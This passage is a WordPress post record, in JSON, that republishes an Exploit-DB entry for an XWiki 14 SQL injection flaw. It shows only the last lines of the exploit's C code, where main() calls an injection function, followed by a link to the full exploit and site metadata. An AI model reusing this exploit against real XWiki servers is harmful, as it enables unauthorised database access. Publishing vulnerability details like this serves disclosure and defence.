\/>\n<br \/>    {<br \/>\n<br \/>        selecetCookie = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>        verbose = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    injection(yourUrl);<br \/>\n<br \/>    return 0;<br \/>\n<br \/>}\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52384\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Exploit ID EDB-ID:52384 Type exploitdb Published 2025-07-28T00:00:00 Modified 2025-07-28T00:00:00 CVSS Information CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,40,13,7,11,5],"class_list":["post-9195","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=9195\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Exploit ID EDB-ID:52384 Type exploitdb Published 2025-07-28T00:00:00 Modified 2025-07-28T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=9195\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-29T03:38:26+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm\",\"datePublished\":\"2025-07-29T03:38:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195\"},\"wordCount\":2237,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=9195#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195\",\"name\":\"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-07-29T03:38:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=9195\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9195#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=9195","og_locale":"en_US","og_type":"article","og_title":"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem","og_description":"Exploit Details Basic Information Exploit Title XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm Exploit ID EDB-ID:52384 Type exploitdb Published 2025-07-28T00:00:00 Modified 2025-07-28T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=9195","og_site_name":"zero redgem","article_published_time":"2025-07-29T03:38:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=9195#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=9195"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm","datePublished":"2025-07-29T03:38:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=9195"},"wordCount":2237,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=9195#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=9195","url":"https:\/\/zero.redgem.net\/?p=9195","name":"XWiki 14 - SQL Injection via getdeleteddocuments.vm - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-29T03:38:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=9195#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=9195"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=9195#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"XWiki 14 &#8211; SQL Injection via getdeleteddocuments.vm"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9195"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9195\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}